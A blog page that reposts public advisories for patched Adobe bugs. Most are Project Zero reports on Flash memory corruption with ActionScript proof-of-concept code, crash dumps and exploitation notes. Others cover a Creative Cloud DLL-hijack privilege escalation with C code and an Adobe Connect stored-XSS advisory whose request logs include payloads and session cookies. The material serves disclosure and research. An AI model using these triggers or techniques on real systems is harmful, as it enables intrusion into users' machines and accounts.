Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863590782

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
The attached fuzz file causes an out-of-bounds read in AVC processing. To reproduce the issue, put both attached files on a server, and vist:

http://127.0.0.1/LoadMP4.swf?file=transpose.mp4

This issue reproduces on Chrome and Firefox for Linux. 


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/45268.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1017

There is a heap overflow in AVC header slicing. To reproduce the issue, put the attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=slice.flv


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41612.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=391&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

There is a use-after-free in attachMovie due to the initObject. If the initObject contains an object that calls a method that deletes the movie clip that is being attached, a use-after-free occurs. A proof-of-concept is as follows:

n = {_quality : {toString : func}};
function func(){
	
	trace("hello");
	
	newResetButton.removeMovieClip();
	return "test";
	}
	
_root.attachMovie("myResetButton","newResetButton",200, n);

A sample fla and swf are attached.

Proof of Concept: 
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37865.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1015

The attached file causes an overflow in heap thumbnailing. To reproduce, place both attached files on a server and visit http://127.0.0.1/LoadImage.swf?img=thumb2.atf


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41610.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=786

The attached ATF file causes a heap overflow in ATF processing. To reproduce this issue, put LoadImage.swf and test.png on a remote server, and visit http://127.0.0.1/LoadImage.swf?img=test.png.

To differentiate this from other ATF issues, this is an overflow in decompressing alphas when an image has a height of 1 pixel. 


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40087.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=635

The attached file causes a crash due to a heap overflow, probably due to an issue in ATF processing by the URLStream class.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39465.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1016

The attached file causes heap corruption when decompressing a planar block. To reproduce the issue, but both attached files on a server and visit: http://127.0.0.1/LoadImage.swf?img=planar1.atf


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/41611.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1216

The attached file causes heap corruption in the ATF parser. To reproduce the issue, copy atffree.atf and LoadImage.swf to a server, and visit http://127.0.0.1/LoadImage.swf?img=atffree.png.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42249.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=793

There is a heap overflow in ATF impage packing. To reproduce the issue, load the attach file '129' using LoadImage.swf as follows:

LoadImage.swf?img=129


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40090.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=801

There is a use-after-free in addProperty. If a property is added to a MovieClip object that already has a watch defined, and the watch deleted the MovieClip, it is used after it is freed.

A minimal PoC follows:

var t = this.createEmptyMovieClip( "t", 1);
t.watch("a", func);
t.addProperty("a", func, func);

function func(){
	
	trace("a");
	
	}

A sample fla and swf are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39830.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=504

The latest version of the Vector.<primitive> length check in Flash 18,0,0,232 is not robust against memory corruptions such as heap overflows. While it’s no longer possible to obviously bypass the length check there’s still unguarded data in the object which could be corrupted to serve as a useful primitive. 

To better describe this currently the Vector primitive object (at least on 32 bit) looks something like:

| unguarded length | unguarded capacity | xored length | ... | data   |

The problem arises because the capacity is not guarded by the xor, and it’s before the xored length which is guarded. As we know the unguarded length value then if we have a suitable memory corruption vulnerability we could corrupt only the length and the capacity fields leaving the xored length alone. Of course we’d need to corrupt the length back to the same value (otherwise the length guard check would fail). If we set the capacity to be greater than that originally allocated then when a call is made to set the length (using the length Vector property) the runtime will assume the allocation is larger than it is and extend the vector over the end of the original allocation.

This in itself is not enough to serve as a useful primitive as extending the vector also 0’s any data afterwards so it’s not an information leak. However we’ve now got a vector which aliases some other part of the heap. If for example something else was allocated immediately after the vector which we can influence then it’d be possible to write data to that and read it out from the vector, and vice versa. Also depending on the heap type it might be possible to reconstruct heap headers, but it probably isn’t on Windows. As vector objects are now on the system heap it’s a lot harder to exploit. It’s likely that an attacker would need to utilize browser specific heap allocations rather than another flash allocation. 

One way of fixing this, at least against buffer overflows, would be to move the xored length before the capacity. In this case the act of overflowing the capacity value would corrupt the guard length leading to the check failure when setting the new length to exceed the existing capacity. This wouldn’t do anything against a heap relative overwrite or a buffer underflow. In that case you could also apply the guard to the capacity field as well. If Vectors are completely moved out from the heap with other objects, as planned, exploiting this would probably be very difficult. 

On a related note, it’s still possible to read the length of the vector without triggering the guard check. The length is whatever the unguarded length is set to. This could be used as a way of checking which vector objects have been corrupted by an overflow. 

I’ve provided a simple example which allocates a 16k UInt vector. Using a debugger you can modify the capacity then press a key to show that the process doesn’t crash (at least doesn’t crash due to a length corruption). The following instructions are for IE11 with 32 bit tabs (the default even on x64 builds). 

1. Load the swf file into IE
2. Attach WinDBG to the IE tab process
3. Search for the data pattern to find the vector using the command “s 0 L?10000000 78 56 34 12 f0 de bc 9a 00 00 00 00”. There should only be one hit.
4. Modify the capacity using the command “ed <address>-0xC 5000” replacing <address> with that found in step 3. Also look at <address>+0n64*0n1024 which will should show other data on the heap. 
5. Resume execution in the debugger.
6. Select the flash object in the browser and press the ‘=’ key, you should see a trace message printing the new length.
7. If you return to the debugger and dump the data at <addresss>+0n64*0n1024 you’ll find the memory has been zeroed. Also at <addresss>+0n64*0n1024+3C you should find that the value 0x88888888 has been written to existing allocated memory. 

The source is a HAXE file, you need to compile with the command line “haxe -main Test -swf output.swf -swf-version 10”

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38348.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=583

If a TextField variable is set to a value with toString defined, and the TextField is updated, a use-after-free can occur if the toString method frees the TextField's parent. A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 301);
var my_txt = mc.createTextField("my_txt", 302, 0, 0, 100, 100); 
trace(my_txt);
my_txt.variable = "today_date"; 
mc.today_date = "blah"; 
var times = 0;
 
var date_interval:Number = setInterval(updateDate, 500);
 
function updateDate() { 
    mc.today_date = {toString : func}; 
}

function func(){
	if(times == 0){
		times++;
		mc.removeMovieClip();
	}

	return "test";
	
	}

A sample fla and swf are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39049.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=355&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

In certain cases where a native AS2 class sets an internal variable, it can lead to a use-after-free if the variable is a SharedObject. While this example shows setting NetConnection.contentType, this applies to several other variables including many proprties of the Sound and NetStream classes.

A proof of concept is as follows:

var s = SharedObject.getLocal("test");
ASSetPropFlags(s, null, 0, 0xff);
ASSetPropFlags(s.data, null, 0, 0xff);
var o = {myprop: "test", myprop2: "test"};
s.data.contentType = o;
flush();
ASnative(2100, 200)(s.data); // new NetConnection
trace(s.data.contentType);
s = 1;

//Do GC

for(var i = 0; i < 100; i++){
	
	var b = new flash.display.BitmapData(100, 1000, true, 1000);
	
	}

setInterval(c, 1000);
function c(){
	ASnative(252, 1).call(o); //Array push

}

A fla, an AS file and two swfs are attached. donotdelete.fla compiles to donotdelete.swf and contains the code that causes the use-after-free. loadswf.as compiles to loadswf.swf, and sets up the heap to cause a crash. To make the issue occur, put loadswf.swf and donotdelete.swf in the same folder on a webserver (the PoCs don't always work locally due to flash network sandboxing), and load loadswf.swf. This PoC only works on 64-bit systems, but the issue would work on a 32-bit system with proper heap set-up. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37852.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=547

If IExternalizable.writeExternal is overridden with a value that is not a function, Flash assumes it is a function even though it is not one. This leads to execution of a 'method' outside of the ActionScript object's ActionScript vtable, leading to memory corruption.

A sample swf is attached. ActionScript code is also attached, but it does not compile to the needed to swf. To get the PoC, decompress the swf using flasm -x myswf, and then search for "triteExternal" and change it to "writeExternal".

This bug is in the AVM serializer (http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/AvmSerializer.cpp), and is type confusion when calling the method writeExternal, which is implemented when a class extends IExternalizable (http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/IExternalizable.html). The method is resolved on line 1437 of AvmSerializer.cpp by calling toplevel->getBinding, which does not guarantee that the binding is a method binding. It then gets cast to a method on line 773 and called, which is type confusion.

One challenge with the bug is actually creating a SWF which can hit this code, as usually overriding a defined method will lead to an illegal override exception. The 0-day author did this differently than I did. The code where all class properties (methods, internal classes, variables, etc.) are resolved is in http://hg.mozilla.org/tamarin-redux/file/5571cf86fc68/core/Traits.cpp. You can see on line 813 that a check that no two properties of a class have the same name is commented out due to some legitimate SWFs doing that. This means that a SWF can have a variable with the same name as a method (overriding a method with less restrictive method is still illegal), which is how my PoC overrode the method. The 0-day did something slightly different, it put the redefinition of writeExternal in a different public namespace than the original definition of writeExternal. This has the benefit that the ActionScript will compile and hit the bug without modification. 

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38490.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=362&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

The following access violation was observed in the Adobe Flash Player plugin:

(1dec.1af0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FlashPlayer.exe - 
eax=00006261 ebx=00001501 ecx=010ae1e4 edx=00006262 esi=0736dda0 edi=05a860d0
eip=0044ae55 esp=010ae170 ebp=010ae564 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210297
FlashPlayer!WinMainSandboxed+0x57aee:
0044ae55 803c3000        cmp     byte ptr [eax+esi],0       ds:002b:07374001=??

0:000> !address esi
[...]
Usage:                  <unknown>
Base Address:           06e60000
End Address:            07374000
Region Size:            00514000
State:                  00001000	MEM_COMMIT
Protect:                00000004	PAGE_READWRITE
Type:                   00020000	MEM_PRIVATE
Allocation Base:        06e60000
Allocation Protect:     00000001	PAGE_NOACCESS

0:000> db esi
0736dda0  8e 56 fa 1b 00 13 e3 85-00 0c 54 72 65 62 75 63  .V........Trebuc
0736ddb0  68 65 74 20 4d 53 3e 00-7e 00 80 00 9f 00 21 01  het MS>.~.....!.
0736ddc0  4c 01 76 01 85 01 97 01-e9 01 02 02 40 02 9a 02  L.v.........@...
0736ddd0  c4 02 1d 03 49 03 d8 03-26 04 4f 04 b5 04 fd 04  ....I...&.O.....
0736dde0  1d 05 39 05 90 05 b1 05-e2 05 f6 05 22 06 40 06  ..9.........".@.
0736ddf0  97 06 da 06 2d 07 94 07-ac 07 d8 07 02 08 21 08  ....-.........!.
0736de00  3f 08 af 08 fb 08 40 09-92 09 e2 09 1c 0a c9 0a  ?.....@.........
0736de10  00 0b 35 0b 5b 0b 77 0b-cd 0b 04 0c 52 0c 9d 0c  ..5.[.w.....R...

Notes:

- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.

- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EAX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "ESI".

- The memory under "ESI" contains a section of the input file starting at offset 0x50dda0.

- Attached samples: signal_sigsegv_7ffff6d8a235_3103_51dea5ced16249520f1fa0a7a63d7b36 (crashing file), 51dea5ced16249520f1fa0a7a63d7b36 (original file). The total difference between the two files is 19 bytes.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37857.zip
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=361&can=1&q=label%3AProduct-Flash%20modified-after%3A2015%2F8%2F17&sort=id

The following access violation was observed in the Adobe Flash Player plugin:

(150c.ca0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FlashPlayer.exe - 
eax=078a53b7 ebx=00f28938 ecx=002dea24 edx=000085ed esi=000085ee edi=09d9eee0
eip=0139a657 esp=002de9b4 ebp=002deda4 iopl=0         nv up ei ng nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210297
FlashPlayer!WinMainSandboxed+0x572f0:
0139a657 8a0402          mov     al,byte ptr [edx+eax]      ds:002b:078ad9a4=??

0:000> !address eax
[...]
Usage:                  <unknown>
Base Address:           07560000
End Address:            078ad000
Region Size:            0034d000
State:                  00001000	MEM_COMMIT
Protect:                00000004	PAGE_READWRITE
Type:                   00020000	MEM_PRIVATE
Allocation Base:        07560000
Allocation Protect:     00000001	PAGE_NOACCESS

0:000> db eax
078a53b7  c5 ea 85 00 00 b6 19 00-38 01 c5 3d 84 9e c2 3d  ........8..=...=
078a53c7  2f 48 d5 a0 2b 00 73 65-63 6f 6e 64 00 00 00 03  /H..+.second....
078a53d7  00 00 00 01 00 00 00 01-00 00 00 00 02 00 00 00  ................
078a53e7  b7 01 00 00 88 39 00 0a-00 74 68 69 73 00 5f 78  .....9...this._x
078a53f7  00 78 6d 00 5f 79 00 79-6d 00 5f 72 6f 6f 74 00  .xm._y.ym._root.
078a5407  66 69 72 73 74 73 00 63-6c 61 75 73 00 68 70 00  firsts.claus.hp.
078a5417  72 65 6d 6f 76 65 4d 6f-76 69 65 43 6c 69 70 00  removeMovieClip.
078a5427  96 02 00 08 00 1c 96 04-00 08 01 08 00 1c 96 02  ................

Notes:

- Reliably reproduces with latest Adobe Flash Player Projector for Windows and Google Chrome for Windows.

- The out-of-bounds read appears to be caused by an overly large index value (stored in the "EDX" register at the time of the crash) relative to a dynamically allocated buffer pointed to by "EAX".

- The memory under "EAX" contains a section of the input file starting at offset 0x3453b7.

- The index (EDX) value originates from offset 0x3453b8 in the file (at 1 byte offset relative to the EAX memory region).

- Attached samples: signal_sigsegv_7ffff6d2184d_5692_9217909125eb9174614e1368d5f07173 (crashing file), 9217909125eb9174614e1368d5f07173 (original file). The total difference between the two files is 13 bytes.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37856.zip
HireHackking 
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=760

The attached mp4 file causes stack corruption in flash. To load, put LoadMP42.swf on a server and load http://127.0.0.1/LoadMP42.swf?file=t.mp4.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39828.zip
HireHackking 
########################################################################################
 
# Title: Adobe Digital Editions <= 4.5.0 - Critical memory corruption
# Application: Adobe Digital Editions
# Version: 4.5.0 and earlier versions
# Platform: Windows, Macintosh, iOS and Android
# Software Link: http://www.adobe.com/solutions/ebook/digital-editions.html
# Date: March 8, 2016
# CVE: CVE-2016-0954
# Author: Pier-Luc Maltais from COSIG
# Contact: https://twitter.com/COSIG_
# Personal contact: https://twitter.com/plmaltais
 
########################################################################################
 
===================
Introduction:
===================
 Adobe® Digital Editions software offers an engaging way to view and manage eBooks and 
 other digital publications. Use it to download and purchase digital content, which can 
 be read both online and offline. Transfer copy-protected eBooks from your personal 
 computer to other computers or devices. Organize your eBooks into a custom library and 
 annotate pages. Digital Editions also supports industry-standard eBook formats, 
 including PDF/A and EPUB. (http://www.adobe.com/ca_fr/products/digital-editions.html)

########################################################################################
 
===================
Report Timeline:
===================
 2015-10-24: Pier-Luc Maltais from COSIG found the issue and report it to Adobe PSIRT.
 2016-03-08: Vendor fixed the issue (APSB16-06).
 2016-03-08: Release of this advisory.

########################################################################################
 
===================
Technical details:
===================
 A critical memory corruption occurs when Adobe Digital Editions handle a specially
 crafted ExtGstate object, which could lead to remote code execution.
 
########################################################################################
 
==========
POC:
==========
https://plmsecurity.net/sites/plmsecurity.net/files/APSB16-06_PoC.pdf
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39533.zip
 
########################################################################################
HireHackking 
[+] Credits: John Page aka hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/ADOBE-CREATIVE-CLOUD-PRIVILEGE-ESCALATION.txt
[+] ISR: apparitionSec



Vendor:
==============
www.adobe.com



Product:
========================================
Adobe Creative Cloud Desktop Application
<= v4.0.0.185 



Vulnerability Type:
=====================
Privilege Escalation



CVE Reference:
==============
CVE-2017-3006
APSB17-13


Vulnerability Details:
=====================
Adobe CC uses weak insecure permissions settings on the "Adobe Photoshop dll & Startup Scripts" directories. This may allow authenticated users
to execute arbitrary code in the security context of ANY other users with elevated privileges on the affected system. Issue is the 'C' flag
(Change) for 'Authenticated Users' group.


References:
============
https://helpx.adobe.com/security/products/creative-cloud/apsb17-13.html


e.g.

C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls>cacls * | more
C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls\libifcoremd.dll BUILTIN\Administrators:(ID)F
                                                                                NT AUTHORITY\SYSTEM:(ID)F
                                                                                BUILTIN\Users:(ID)R
                                                                                NT AUTHORITY\Authenticated Users:(ID)C

C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls\libmmd.dll BUILTIN\Administrators:(ID)F
                                                                           NT AUTHORITY\SYSTEM:(ID)F
                                                                           BUILTIN\Users:(ID)R
                                                                           NT AUTHORITY\Authenticated Users:(ID)C



C:\Program Files (x86)\Common Files\Adobe\32 bit Photoshop dlls>ls -lt
total 2407
-rwxr-xr-x    1 Test     Administ   895184 Jun  3  2016 libifcoremd.dll
-rwxr-xr-x    1 Test     Administ  4033464 Jun  3  2016 libmmd.dll


///////////  AND /////////////////////


C:\Program Files (x86)\Common Files\Adobe\Startup Scripts CC\Adobe Photoshop>cacls * | more
C:\Program Files (x86)\Common Files\Adobe\Startup Scripts CC\Adobe Photoshop\photoshop BUILTIN\Administrators:(ID)F
                                                                                       BUILTIN\Administrators:(OI)(CI)(IO)(ID)F
                                                                                       NT AUTHORITY\SYSTEM:(ID)F
                                                                                       NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(ID)F
                                                                                       BUILTIN\Users:(OI)(CI)(ID)R
                                                                                       NT AUTHORITY\Authenticated Users:(ID)C
                                                                                       NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)(ID)C

C:\Program Files (x86)\Common Files\Adobe\Startup Scripts CC\Adobe Photoshop\photoshop.jsx BUILTIN\Administrators:(ID)F
                                                                                           NT AUTHORITY\SYSTEM:(ID)F
                                                                                           BUILTIN\Users:(ID)R
                                                                                           NT AUTHORITY\Authenticated Users:(ID)C




Exploit/POC code(s):
====================
Compile below DLL 'C' code name it as "libifcoremd.dll"
Replace existing Adobe CC "libifcoremd.dll" file, wait for it to be referenced.


#include <windows.h>

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, NULL, "PWN!", MB_OK);  
    break;
  }
  return TRUE;
}


gcc -c libifcoremd.c
gcc -shared -o  libifcoremd.dll libifcoremd.o



Disclosure Timeline:
========================================
Vendor Notification: January 25, 2017
Vendor updates Adobe CC : April 11, 2017
April 12, 2017 : Public Disclosure



Exploitation Technique:
=======================
Local



Severity Level:
===============
Medium



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
HireHackking 
Document Title:
===============
Adobe Connect & Desktop v9.5.7 - Persistent Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1838

Security ID: PSIRT-5180

Bulletin: https://helpx.adobe.com/security/products/connect/apsb16-35.html

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7851

Public News Article: http://www.securityweek.com/adobe-patches-9-flash-player-flaws-reported-zdi


CVE-ID:
=======
CVE-2016-7851


Release Date:
=============
2016-11-09


Vulnerability Laboratory ID (VL-ID):
====================================
1838


Common Vulnerability Scoring System:
====================================
3.7


Product & Service Introduction:
===============================
Whether it is a smartphone or tablet app, a game, a video, a digital magazine, a website, or an online experience,
chances are that it was touched by Adobe technology. Our tools and services enable our customers to create
groundbreaking digital content, deploy it across media and devices, and then continually measure and optimize it
based on user data. By providing complete solutions that combine digital media creation with data-driven marketing,
we help businesses improve their communications, strengthen their brands, and ultimately achieve greater business success.

(Copy of the Vendor Homepage: http://www.adobe.com/aboutadobe/)


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered an application-side vulnerability in the Adobe Connect online web-application and v9.5.6 windows software.


Vulnerability Disclosure Timeline:
==================================
2016-04-27: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2016-04-28: Vendor Notification (PSIRT Adobe Security Team)
2016-04-29: Vendor Response/Feedback (PSIRT Adobe Security Team)
2016-10-20: Vendor Fix/Patch (Adobe Service Developer Team)
2016-11-08: Security Acknowledgements (Adobe Security Team)
2016-11-09: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Adobe Systems
Product: Adobe Connect - Online Service (Web-Application) 2016 Q2


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
An application-side input validation and xss vulnerability has been discovered in the Adobe Connect online web-application and v9.5.6 windows software.
The input validation and filter issue allows remote attackers to inject own malicious script codes to the server-side of the vulnerable modules context.

The vulnerability is located in the `firstname`,`lastname` and `companyname` parameter of the `event_registration.html` file submit POST method request. 
Remote attackers are able to inject own malicious script codes in the vulnerable parameters POST method request to manipulate the adobe connect events 
service emails for the webinar registration module. The email body does not encode the input values and the registration is not restricted on inputs as 
well, which results in the application-side script code execution. Attackers are also able to followup the webinar links with the injected credentials 
which may be result in a second persistent script code execution as well. The injection point is the registration input form of the webinar in adobe 
connect and the execution point occurs in the email body context of the admin@adobeconnect.com email address.

The security risk of the persistent input validation web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. 
Exploitation of the persistent input validation web vulnerability requires a low privilege web-application user account and low user interaction. 
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent redirect to external sources 
and persistent manipulation of affected or connected service module context.

Request Method(s): Inject
				[+] POST

Vulnerable Module(s):
				[+] Events - Webinar Registration Form

Vulnerable File(s):
				[+] event_registration.html

Vulnerable Parameter(s):
				[+] firstname
				[+] lastname
				[+] companyname

Affected Module(s):
				[+]  (admin@adobeconnect.com)


Proof of Concept (PoC):
=======================
The persistent vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.


Manual steps to reproduce the vulnerability ...
1.  Open your mailbox and click to the portals webinar email for administrators
2.  Surf to the signup registration of adobe connect next to the events reck
3.  Inject to the firstname, lastname and companyname your own script code payload
4.  Submit the POST request to get activated for the webinar to hackerone via adobe connect
5.  Check the local input of the registered account
6.  The script code payloads of the name values are replied by the email service without secure encode
Note: The execution of the payloads occurs directly after the arrival and view
7.  Now choose in the email the link to the webinar that is connected to the name values
8.  Join the channel and write a message for interaction
9.  The code executes in several sections of the webinar adobe connect events service with persistent vector
10. Successful reproduce of the both application-side vulnerabilities in adobe via hackerone!


PoC: event_registration.html
<div style="font-size: 12pt;color: #1d1d1d;font-family: Tahoma;font-style: normal;background-color: #FFFFFF;"> 
<p>>"<[PERSISTENT INJECTED SCRIPT CODE VULNERABILITY!]></p> 
<p>We are pleased to confirm your registration for The Art and Science of Bug Bounty Triage - April 28, 2016. We look forward to your participation in the event.</p> 
</div>


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://events-na1.adobeconnect.com/content/connect/connect-action?sco-id=2159915051 
Mime Type[text/html]
   Request Header:
      Host[events-na1.adobeconnect.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate, br]
      Referer[https://events-na1.adobeconnect.com/content/connect/c1/2152090704/en/events/event/shared/2159889590/event_registration.html?sco-id=2159915051&campaign-id=DG-EM-Art%20of%20Triage-2Q2016-2&_charset_=utf-8]
      Cookie[2159915051_campaign-id=DG-EM-Art%20of%20Triage-2Q2016-2; connectevent_campaign-id=DG-EM-Art%20of%20Triage-2Q2016-2; BREEZESESSION=na1breezpuz9xczd47kqnkqt; time-zone=Europe%2FBerlin; s_cc=true; s_sq=acnapvtpyd8zd0ka1b3qdt5jp4i76%3D%2526pid%253Dhttps%25253A%25252F%25252Fevents-na1.adobeconnect.com%25252Fcontent%25252Fconnect%25252Fc1%25252F2152090704%25252Fen%25252Fevents%25252Fevent%25252Fshared%25252F2159889590%25252Fevent_registration.html%25253Fsco-id%25253D2159915051%252526campaign-id%25253DDG-EM-Art%25252520of%25252520Triage-2Q2016-2%252526_charset_%25253Dutf-8%2526oid%253Dfunctiononclick(event)%25257BregFormSubmit()%25253B%25257D%2526oidt%253D2%2526ot%253DA]
      Connection[keep-alive]
   POST-Daten:
      2159915054[Yes]
      2159915055[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      2159915056[%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E+++%22%3E%3C%22%3Cimg+src%3D%22x%22%3E%2520%2520%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      2159915057[adasfaf+asfasdfasfasfasdfsdfs]
      login[bkm%40evolution-sec.com]
      first-name[%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      last-name[%3E%22%3Ciframe+src%3Da%3E%2520%3Ciframe%3E]
      campaign-id[DG-EM-Art%2520of%2520Triage-2Q2016-2]
      sco-id[2159915051]
      reg-form-back[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.html]
      reg-form-success[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.result.html]
      action[event-register]
      _charset_[UTF-8]
      login-uri[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.login.html%3Flogin-ok%3D%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fevent_registration.html%26sco-id%3D2159915051]
      set-lang[en]
      reg-confirm-page[%2Fcontent%2Fconnect%2Fc1%2F2152090704%2Fen%2Fevents%2Fevent%2Fshared%2F2159889590%2Fregistration_confirm.html]
   Response Header:
      Connection[Keep-Alive]
      Server[Day-Servlet-Engine/4.1.24]
      Content-Type[text/html;charset=UTF-8]
      Date[Wed, 27 Apr 2016 08:56:07 GMT]
      Transfer-Encoding[chunked]
      Set-Cookie[2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connectconnectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect 
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
connectevent_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
2159915051_campaign-id=DG-EM-Art%2520of%2520Triage-2Q2016-2; Path=/content/connect
